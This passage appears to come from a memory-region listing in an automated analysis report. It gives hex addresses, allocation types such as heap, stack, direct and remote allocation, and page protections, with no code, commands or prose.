page execute and read and write
|
||
B564000
|
direct allocation
|
page execute and read and write
|
||
228A0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B2CA000
|
direct allocation
|
page execute and read and write
|
||
340F000
|
stack
|
page read and write
|
||
A863000
|
direct allocation
|
page execute and read and write
|
||
B004000
|
direct allocation
|
page execute and read and write
|
||
6810000
|
heap
|
page read and write
|
||
860B000
|
heap
|
page read and write
|
||
23931000
|
trusted library allocation
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
8A59000
|
heap
|
page read and write
|
||
B87D000
|
direct allocation
|
page execute and read and write
|
||
AFDD000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
BE2C000
|
direct allocation
|
page execute and read and write
|
||
B009000
|
direct allocation
|
page execute and read and write
|
||
BBCB000
|
direct allocation
|
page execute and read and write
|
||
5AB000
|
trusted library allocation
|
page execute and read and write
|
||
BCD0000
|
direct allocation
|
page execute and read and write
|
||
B9C9000
|
direct allocation
|
page execute and read and write
|
||
B5C7000
|
direct allocation
|
page execute and read and write
|
||
BCE7000
|
direct allocation
|
page execute and read and write
|
||
8790000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page readonly
|
||
23BB0000
|
trusted library allocation
|
page read and write
|
||
BCCE000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
242C5000
|
heap
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
AFFC000
|
direct allocation
|
page execute and read and write
|
||
B8BD000
|
direct allocation
|
page execute and read and write
|
||
23F50000
|
heap
|
page read and write
|
||
BA03000
|
direct allocation
|
page execute and read and write
|
||
B810000
|
direct allocation
|
page execute and read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
22068000
|
trusted library allocation
|
page read and write
|
||
B1D1000
|
direct allocation
|
page execute and read and write
|
||
86A0000
|
trusted library allocation
|
page read and write
|
||
BDC9000
|
direct allocation
|
page execute and read and write
|
||
AF23000
|
direct allocation
|
page execute and read and write
|
||
AD0B000
|
direct allocation
|
page execute and read and write
|
||
BED8000
|
direct allocation
|
page execute and read and write
|
||
2565E000
|
stack
|
page read and write
|
||
6860000
|
heap
|
page read and write
|
||
6F50000
|
direct allocation
|
page read and write
|
||
BF93000
|
direct allocation
|
page execute and read and write
|
||
3160000
|
heap
|
page execute and read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
AE80000
|
direct allocation
|
page execute and read and write
|
||
B67E000
|
direct allocation
|
page execute and read and write
|
||
B464000
|
direct allocation
|
page execute and read and write
|
||
B111000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
BA0B000
|
direct allocation
|
page execute and read and write
|
||
21BB0000
|
remote allocation
|
page read and write
|
||
BD2C000
|
direct allocation
|
page execute and read and write
|
||
57D000
|
trusted library allocation
|
page execute and read and write
|
||
2506D000
|
trusted library allocation
|
page read and write
|
||
34EE000
|
stack
|
page read and write
|
||
BA6F000
|
direct allocation
|
page execute and read and write
|
||
2267F000
|
stack
|
page read and write
|
||
24302000
|
heap
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BDA6000
|
direct allocation
|
page execute and read and write
|
||
89D0000
|
heap
|
page read and write
|
||
4AE000
|
stack
|
page read and write
|
||
B4DA000
|
direct allocation
|
page execute and read and write
|
||
B069000
|
direct allocation
|
page execute and read and write
|
||
BBB2000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AE8F000
|
direct allocation
|
page execute and read and write
|
||
BD68000
|
direct allocation
|
page execute and read and write
|
||
B118000
|
direct allocation
|
page execute and read and write
|
||
BA5B000
|
direct allocation
|
page execute and read and write
|
||
B8A5000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BEA7000
|
direct allocation
|
page execute and read and write
|
||
B9CF000
|
direct allocation
|
page execute and read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
BCE2000
|
direct allocation
|
page execute and read and write
|
||
83E0000
|
heap
|
page read and write
|
||
B22F000
|
direct allocation
|
page execute and read and write
|
||
21E49000
|
trusted library allocation
|
page read and write
|
||
AFFD000
|
direct allocation
|
page execute and read and write
|
||
B71A000
|
direct allocation
|
page execute and read and write
|
||
BE8C000
|
direct allocation
|
page execute and read and write
|
||
65E4000
|
heap
|
page read and write
|
||
B1F9000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
4D20000
|
trusted library allocation
|
page execute and read and write
|
||
221A1000
|
trusted library allocation
|
page read and write
|
||
AE36000
|
direct allocation
|
page execute and read and write
|
||
B0F0000
|
direct allocation
|
page execute and read and write
|
||
BCE3000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
BAC6000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
23B14000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24D40000
|
trusted library allocation
|
page read and write
|
||
BE27000
|
direct allocation
|
page execute and read and write
|
||
2277E000
|
stack
|
page read and write
|
||
BA75000
|
direct allocation
|
page execute and read and write
|
||
BF34000
|
direct allocation
|
page execute and read and write
|
||
AC97000
|
direct allocation
|
page execute and read and write
|
||
B699000
|
direct allocation
|
page execute and read and write
|
||
B11C000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
3212000
|
trusted library allocation
|
page read and write
|
||
BCA9000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B2AA000
|
direct allocation
|
page execute and read and write
|
||
948E000
|
stack
|
page read and write
|
||
BBA7000
|
direct allocation
|
page execute and read and write
|
||
BD7C000
|
direct allocation
|
page execute and read and write
|
||
ADC1000
|
direct allocation
|
page execute and read and write
|
||
2462F000
|
stack
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BD7C000
|
direct allocation
|
page execute and read and write
|
||
241B1000
|
heap
|
page read and write
|
||
ADB6000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B21B000
|
direct allocation
|
page execute and read and write
|
||
A97D000
|
direct allocation
|
page execute and read and write
|
||
BC52000
|
direct allocation
|
page execute and read and write
|
||
B8FE000
|
direct allocation
|
page execute and read and write
|
||
6490000
|
direct allocation
|
page read and write
|
||
AE79000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B2CD000
|
direct allocation
|
page execute and read and write
|
||
B5E1000
|
direct allocation
|
page execute and read and write
|
||
B24E000
|
direct allocation
|
page execute and read and write
|
||
84AA000
|
heap
|
page read and write
|
||
85FD000
|
heap
|
page read and write
|
||
AF4B000
|
direct allocation
|
page execute and read and write
|
||
ADD0000
|
direct allocation
|
page execute and read and write
|
||
230E6000
|
trusted library allocation
|
page read and write
|
||
AC99000
|
direct allocation
|
page execute and read and write
|
||
B1DB000
|
direct allocation
|
page execute and read and write
|
||
B7B4000
|
direct allocation
|
page execute and read and write
|
||
BF23000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BDB9000
|
direct allocation
|
page execute and read and write
|
||
B82C000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
7A84000
|
trusted library allocation
|
page read and write
|
||
86A0000
|
heap
|
page read and write
|
||
B86A000
|
direct allocation
|
page execute and read and write
|
||
AFFA000
|
direct allocation
|
page execute and read and write
|
||
23DF8000
|
trusted library allocation
|
page read and write
|
||
B1E1000
|
direct allocation
|
page execute and read and write
|
||
AC80000
|
direct allocation
|
page execute and read and write
|
||
B005000
|
direct allocation
|
page execute and read and write
|
||
B08D000
|
direct allocation
|
page execute and read and write
|
||
AD96000
|
direct allocation
|
page execute and read and write
|
||
511E000
|
stack
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
513000
|
heap
|
page read and write
|
||
B0BE000
|
direct allocation
|
page execute and read and write
|
||
4FF7000
|
trusted library allocation
|
page read and write
|
||
AE63000
|
direct allocation
|
page execute and read and write
|
||
B6BF000
|
direct allocation
|
page execute and read and write
|
||
24EB1000
|
trusted library allocation
|
page read and write
|
||
7560000
|
heap
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
6FE0000
|
direct allocation
|
page read and write
|
||
24EAE000
|
stack
|
page read and write
|
||
70FD000
|
heap
|
page read and write
|
||
B02B000
|
direct allocation
|
page execute and read and write
|
||
22E0B000
|
trusted library allocation
|
page read and write
|
||
BB11000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AB5D000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B6B3000
|
direct allocation
|
page execute and read and write
|
||
B0C6000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
B3AC000
|
direct allocation
|
page execute and read and write
|
||
B3F0000
|
direct allocation
|
page execute and read and write
|
||
AD8B000
|
direct allocation
|
page execute and read and write
|
||
B989000
|
direct allocation
|
page execute and read and write
|
||
B03C000
|
direct allocation
|
page execute and read and write
|
||
220E8000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
BA19000
|
direct allocation
|
page execute and read and write
|
||
8833000
|
trusted library allocation
|
page read and write
|
||
BE5D000
|
direct allocation
|
page execute and read and write
|
||
ADB5000
|
direct allocation
|
page execute and read and write
|
||
891F000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
B9D7000
|
direct allocation
|
page execute and read and write
|
||
3470000
|
trusted library allocation
|
page read and write
|
||
BB5D000
|
direct allocation
|
page execute and read and write
|
||
B3F2000
|
direct allocation
|
page execute and read and write
|
||
B543000
|
direct allocation
|
page execute and read and write
|
||
BAC0000
|
direct allocation
|
page execute and read and write
|
||
2216A000
|
trusted library allocation
|
page read and write
|
||
22AD7000
|
trusted library allocation
|
page read and write
|
||
BC8C000
|
direct allocation
|
page execute and read and write
|
||
B82E000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
AFB5000
|
direct allocation
|
page execute and read and write
|
||
78F0000
|
trusted library allocation
|
page read and write
|
||
B9EE000
|
direct allocation
|
page execute and read and write
|
||
2456E000
|
stack
|
page read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
AD98000
|
direct allocation
|
page execute and read and write
|
||
23BB4000
|
trusted library allocation
|
page read and write
|
||
B22C000
|
direct allocation
|
page execute and read and write
|
||
B83E000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
BAC2000
|
direct allocation
|
page execute and read and write
|
||
BDD3000
|
direct allocation
|
page execute and read and write
|
||
8917000
|
heap
|
page read and write
|
||
230EC000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
222F000
|
stack
|
page read and write
|
||
A60A000
|
direct allocation
|
page execute and read and write
|
||
BBCE000
|
direct allocation
|
page execute and read and write
|
||
AE46000
|
direct allocation
|
page execute and read and write
|
||
B1E5000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AA90000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B477000
|
direct allocation
|
page execute and read and write
|
||
A9E5000
|
direct allocation
|
page execute and read and write
|
||
B146000
|
direct allocation
|
page execute and read and write
|
||
BC2E000
|
direct allocation
|
page execute and read and write
|
||
B5F8000
|
direct allocation
|
page execute and read and write
|
||
25794000
|
trusted library allocation
|
page read and write
|
||
ADBB000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B280000
|
direct allocation
|
page execute and read and write
|
||
BB75000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
B156000
|
direct allocation
|
page execute and read and write
|
||
ADE4000
|
direct allocation
|
page execute and read and write
|
||
5B43000
|
trusted library allocation
|
page read and write
|
||
B790000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B325000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
32C5000
|
heap
|
page read and write
|
||
2295C000
|
trusted library allocation
|
page read and write
|
||
B921000
|
direct allocation
|
page execute and read and write
|
||
B242000
|
direct allocation
|
page execute and read and write
|
||
B658000
|
direct allocation
|
page execute and read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
B66D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA8C000
|
direct allocation
|
page execute and read and write
|
||
B4FC000
|
direct allocation
|
page execute and read and write
|
||
BA98000
|
direct allocation
|
page execute and read and write
|
||
3130000
|
heap
|
page readonly
|
||
B985000
|
direct allocation
|
page execute and read and write
|
||
22170000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B8A2000
|
direct allocation
|
page execute and read and write
|
||
B014000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
6F20000
|
direct allocation
|
page read and write
|
||
B49D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
22174000
|
trusted library allocation
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
21FA9000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
3225000
|
trusted library allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B244000
|
direct allocation
|
page execute and read and write
|
||
B3A5000
|
direct allocation
|
page execute and read and write
|
||
BC66000
|
direct allocation
|
page execute and read and write
|
||
B5BA000
|
direct allocation
|
page execute and read and write
|
||
B130000
|
direct allocation
|
page execute and read and write
|
||
256F0000
|
trusted library allocation
|
page read and write
|
||
BA73000
|
direct allocation
|
page execute and read and write
|
||
24317000
|
heap
|
page read and write
|
||
BBAC000
|
direct allocation
|
page execute and read and write
|
||
25790000
|
trusted library allocation
|
page read and write
|
||
B14A000
|
direct allocation
|
page execute and read and write
|
||
23F46000
|
trusted library allocation
|
page read and write
|
||
B2E9000
|
direct allocation
|
page execute and read and write
|
||
ADCE000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
21D7F000
|
stack
|
page read and write
|
||
B966000
|
direct allocation
|
page execute and read and write
|
||
BDD2000
|
direct allocation
|
page execute and read and write
|
||
574000
|
trusted library allocation
|
page read and write
|
||
BBA9000
|
direct allocation
|
page execute and read and write
|
||
3539000
|
heap
|
page read and write
|
||
23C18000
|
trusted library allocation
|
page read and write
|
||
AE9E000
|
direct allocation
|
page execute and read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B40D000
|
direct allocation
|
page execute and read and write
|
||
23C0C000
|
trusted library allocation
|
page read and write
|
||
AF40000
|
direct allocation
|
page execute and read and write
|
||
B090000
|
direct allocation
|
page execute and read and write
|
||
24CA0000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
4E90000
|
heap
|
page read and write
|
||
B246000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
74CC000
|
heap
|
page read and write
|
||
B8E7000
|
direct allocation
|
page execute and read and write
|
||
2306F000
|
trusted library allocation
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
BD48000
|
direct allocation
|
page execute and read and write
|
||
22AC8000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B0E3000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
ACBD000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
4DD5000
|
heap
|
page execute and read and write
|
||
AFE9000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B025000
|
direct allocation
|
page execute and read and write
|
||
B9FF000
|
direct allocation
|
page execute and read and write
|
||
B33A000
|
direct allocation
|
page execute and read and write
|
||
AF81000
|
direct allocation
|
page execute and read and write
|
||
B96D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B1BD000
|
direct allocation
|
page execute and read and write
|
||
B0F6000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
21A8E000
|
stack
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
A976000
|
direct allocation
|
page execute and read and write
|
||
B628000
|
direct allocation
|
page execute and read and write
|
||
B3B8000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
96000
|
stack
|
page read and write
|
||
24BDA000
|
heap
|
page read and write
|
||
22A97000
|
trusted library allocation
|
page read and write
|
||
B078000
|
direct allocation
|
page execute and read and write
|
||
B816000
|
direct allocation
|
page execute and read and write
|
||
BCE6000
|
direct allocation
|
page execute and read and write
|
||
24CC0000
|
trusted library allocation
|
page execute and read and write
|
||
23924000
|
trusted library allocation
|
page read and write
|
||
B39F000
|
direct allocation
|
page execute and read and write
|
||
AE67000
|
direct allocation
|
page execute and read and write
|
||
BC01000
|
direct allocation
|
page execute and read and write
|
||
BCB1000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
B8F1000
|
direct allocation
|
page execute and read and write
|
||
B7E3000
|
direct allocation
|
page execute and read and write
|
||
BCDC000
|
direct allocation
|
page execute and read and write
|
||
BDC1000
|
direct allocation
|
page execute and read and write
|
||
A9A3000
|
direct allocation
|
page execute and read and write
|
||
592000
|
trusted library allocation
|
page read and write
|
||
21A0D000
|
stack
|
page read and write
|
||
B63A000
|
direct allocation
|
page execute and read and write
|
||
B2D0000
|
direct allocation
|
page execute and read and write
|
||
23B10000
|
trusted library allocation
|
page read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
BE9A000
|
direct allocation
|
page execute and read and write
|
||
4F90000
|
remote allocation
|
page execute and read and write
|
||
ACE7000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B518000
|
direct allocation
|
page execute and read and write
|
||
24B80000
|
heap
|
page read and write
|
||
BA0D000
|
direct allocation
|
page execute and read and write
|
||
B87F000
|
direct allocation
|
page execute and read and write
|
||
AE86000
|
direct allocation
|
page execute and read and write
|
||
627000
|
heap
|
page read and write
|
||
25790000
|
trusted library allocation
|
page read and write
|
||
B9DD000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
242CB000
|
heap
|
page read and write
|
||
B154000
|
direct allocation
|
page execute and read and write
|
||
8A20000
|
direct allocation
|
page execute and read and write
|
||
A7D4000
|
direct allocation
|
page execute and read and write
|
||
8C50000
|
trusted library allocation
|
page read and write
|
||
228C0000
|
trusted library allocation
|
page read and write
|
||
AF38000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B073000
|
direct allocation
|
page execute and read and write
|
||
AEEB000
|
direct allocation
|
page execute and read and write
|
||
B844000
|
direct allocation
|
page execute and read and write
|
||
23A2A000
|
trusted library allocation
|
page read and write
|
||
BE52000
|
direct allocation
|
page execute and read and write
|
||
AF1F000
|
direct allocation
|
page execute and read and write
|
||
BC3A000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page execute and read and write
|
||
B400000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BC4C000
|
direct allocation
|
page execute and read and write
|
||
B792000
|
direct allocation
|
page execute and read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BA6F000
|
direct allocation
|
page execute and read and write
|
||
BEDA000
|
direct allocation
|
page execute and read and write
|
||
AB63000
|
direct allocation
|
page execute and read and write
|
||
AF32000
|
direct allocation
|
page execute and read and write
|
||
23971000
|
trusted library allocation
|
page read and write
|
||
AF49000
|
direct allocation
|
page execute and read and write
|
||
B2E4000
|
direct allocation
|
page execute and read and write
|
||
B804000
|
direct allocation
|
page execute and read and write
|
||
23F05000
|
trusted library allocation
|
page read and write
|
||
22C08000
|
trusted library allocation
|
page read and write
|
||
B0FC000
|
direct allocation
|
page execute and read and write
|
||
BD73000
|
direct allocation
|
page execute and read and write
|
||
BCE9000
|
direct allocation
|
page execute and read and write
|
||
229B8000
|
trusted library allocation
|
page read and write
|
||
ADEC000
|
direct allocation
|
page execute and read and write
|
||
2452E000
|
stack
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AD91000
|
direct allocation
|
page execute and read and write
|
||
5B6A000
|
trusted library allocation
|
page read and write
|
||
B1D7000
|
direct allocation
|
page execute and read and write
|
||
21B4E000
|
stack
|
page read and write
|
||
AEB0000
|
direct allocation
|
page execute and read and write
|
||
2F47000
|
heap
|
page read and write
|
||
231C5000
|
trusted library allocation
|
page read and write
|
||
BD0B000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BE88000
|
direct allocation
|
page execute and read and write
|
||
6D60000
|
heap
|
page readonly
|
||
AEB3000
|
direct allocation
|
page execute and read and write
|
||
BA11000
|
direct allocation
|
page execute and read and write
|
||
B4FE000
|
direct allocation
|
page execute and read and write
|
||
BB47000
|
direct allocation
|
page execute and read and write
|
||
3222000
|
trusted library allocation
|
page read and write
|
||
BD65000
|
direct allocation
|
page execute and read and write
|
||
AF7B000
|
direct allocation
|
page execute and read and write
|
||
B282000
|
direct allocation
|
page execute and read and write
|
||
6EDD000
|
stack
|
page read and write
|
||
AF2B000
|
direct allocation
|
page execute and read and write
|
||
2FA9000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BB59000
|
direct allocation
|
page execute and read and write
|
||
AD8F000
|
direct allocation
|
page execute and read and write
|
||
B620000
|
direct allocation
|
page execute and read and write
|
||
BBA1000
|
direct allocation
|
page execute and read and write
|
||
21E9C000
|
trusted library allocation
|
page read and write
|
||
8CF0000
|
trusted library allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B68A000
|
direct allocation
|
page execute and read and write
|
||
BB81000
|
direct allocation
|
page execute and read and write
|
||
5B87000
|
trusted library allocation
|
page read and write
|
||
21E5F000
|
trusted library allocation
|
page read and write
|
||
AE93000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B453000
|
direct allocation
|
page execute and read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
AF51000
|
direct allocation
|
page execute and read and write
|
||
ACFA000
|
direct allocation
|
page execute and read and write
|
||
7AD0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B7A4000
|
direct allocation
|
page execute and read and write
|
||
3208000
|
heap
|
page read and write
|
||
B0EE000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
A65D000
|
direct allocation
|
page execute and read and write
|
||
7565000
|
heap
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
452000
|
unkown
|
page readonly
|
||
AD17000
|
direct allocation
|
page execute and read and write
|
||
AF6F000
|
direct allocation
|
page execute and read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
BAE0000
|
direct allocation
|
page execute and read and write
|
||
A961000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
BFFB000
|
direct allocation
|
page execute and read and write
|
||
242EA000
|
heap
|
page read and write
|
||
BA13000
|
direct allocation
|
page execute and read and write
|
||
B62E000
|
direct allocation
|
page execute and read and write
|
||
BE54000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B413000
|
direct allocation
|
page execute and read and write
|
||
B964000
|
direct allocation
|
page execute and read and write
|
||
B060000
|
direct allocation
|
page execute and read and write
|
||
ADD9000
|
direct allocation
|
page execute and read and write
|
||
ABD1000
|
direct allocation
|
page execute and read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
22BED000
|
trusted library allocation
|
page read and write
|
||
BD78000
|
direct allocation
|
page execute and read and write
|
||
B127000
|
direct allocation
|
page execute and read and write
|
||
BBE7000
|
direct allocation
|
page execute and read and write
|
||
60E000
|
stack
|
page read and write
|
||
B468000
|
direct allocation
|
page execute and read and write
|
||
24C60000
|
heap
|
page read and write
|
||
24C70000
|
trusted library allocation
|
page read and write
|
||
BCC2000
|
direct allocation
|
page execute and read and write
|
||
AB7F000
|
direct allocation
|
page execute and read and write
|
||
AFD4000
|
direct allocation
|
page execute and read and write
|
||
B11A000
|
direct allocation
|
page execute and read and write
|
||
AE2E000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AF12000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AEA5000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B390000
|
direct allocation
|
page execute and read and write
|
||
B888000
|
direct allocation
|
page execute and read and write
|
||
2275000
|
heap
|
page read and write
|
||
873D000
|
stack
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
BA29000
|
direct allocation
|
page execute and read and write
|
||
573000
|
trusted library allocation
|
page execute and read and write
|
||
AB18000
|
direct allocation
|
page execute and read and write
|
||
21DE0000
|
heap
|
page read and write
|
||
226E000
|
stack
|
page read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
22490000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AFE7000
|
direct allocation
|
page execute and read and write
|
||
B9CC000
|
direct allocation
|
page execute and read and write
|
||
B8B7000
|
direct allocation
|
page execute and read and write
|
||
B999000
|
direct allocation
|
page execute and read and write
|
||
257F0000
|
trusted library allocation
|
page read and write
|
||
B386000
|
direct allocation
|
page execute and read and write
|
||
22983000
|
trusted library allocation
|
page read and write
|
||
AE05000
|
direct allocation
|
page execute and read and write
|
||
22C6B000
|
trusted library allocation
|
page read and write
|
||
220E2000
|
trusted library allocation
|
page read and write
|
||
24FFE000
|
stack
|
page read and write
|
||
BB1D000
|
direct allocation
|
page execute and read and write
|
||
B32A000
|
direct allocation
|
page execute and read and write
|
||
21F80000
|
trusted library allocation
|
page read and write
|
||
AF7F000
|
direct allocation
|
page execute and read and write
|
||
BCAD000
|
direct allocation
|
page execute and read and write
|
||
B2BB000
|
direct allocation
|
page execute and read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
A990000
|
direct allocation
|
page execute and read and write
|
||
6F80000
|
direct allocation
|
page read and write
|
||
BCD2000
|
direct allocation
|
page execute and read and write
|
||
BBD2000
|
direct allocation
|
page execute and read and write
|
||
B824000
|
direct allocation
|
page execute and read and write
|
||
B5FF000
|
direct allocation
|
page execute and read and write
|
||
6F30000
|
direct allocation
|
page read and write
|
||
B802000
|
direct allocation
|
page execute and read and write
|
||
AF16000
|
direct allocation
|
page execute and read and write
|
||
B1D5000
|
direct allocation
|
page execute and read and write
|
||
8A8F000
|
heap
|
page read and write
|
||
B9C3000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BADD000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
5310000
|
direct allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
AE51000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
2208F000
|
trusted library allocation
|
page read and write
|
||
BC12000
|
direct allocation
|
